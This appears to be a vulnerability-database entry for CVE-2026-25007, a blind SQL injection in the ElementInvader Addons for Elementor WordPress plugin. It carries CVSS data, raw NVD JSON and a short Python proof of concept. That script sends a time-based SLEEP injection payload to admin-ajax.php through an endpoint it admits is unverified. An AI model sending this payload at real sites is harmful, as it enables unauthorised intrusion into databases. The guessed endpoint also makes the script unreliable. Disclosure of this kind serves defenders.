Security Vulnerability Report
中文
CVE-2026-25007 CVSS 8.5 HIGH

CVE-2026-25007

Published: 2026-03-25 17:16:42
Last Modified: 2026-04-24 16:32:54

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Element Invader ElementInvader Addons for Elementor elementinvader-addons-for-elementor allows Blind SQL Injection.This issue affects ElementInvader Addons for Elementor: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

ElementInvader Addons for Elementor <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests def check_sqli(url): # Vulnerable endpoint example (needs verification based on actual plugin code) target = f"{url}/wp-admin/admin-ajax.php" # Time-based blind SQL injection payload payload = { "action": "elementinvader_data_fetch", "id": "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)" } try: response = requests.post(target, data=payload, timeout=10) if response.elapsed.total_seconds() >= 5: return "[+] Vulnerable to SQL Injection" else: return "[-] Not vulnerable or payload incorrect" except Exception as e: return f"Error: {e}" if __name__ == "__main__": target_url = "http://example.com" print(check_sqli(target_url))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25007", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:41.600", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Element Invader ElementInvader Addons for Elementor elementinvader-addons-for-elementor allows Blind SQL Injection.This issue affects ElementInvader Addons for Elementor: from n/a through <= 1.4.2."}, {"lang": "es", "value": "Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Element Invader ElementInvader Addons for Elementor elementinvader-addons-for-elementor permite inyección SQL ciega. Este problema afecta a ElementInvader Addons for Elementor: desde n/a hasta &lt;= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/elementinvader-addons-for-elementor/vulnerability/wordpress-elementinvader-addons-for-elementor-plugin-1-4-2-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}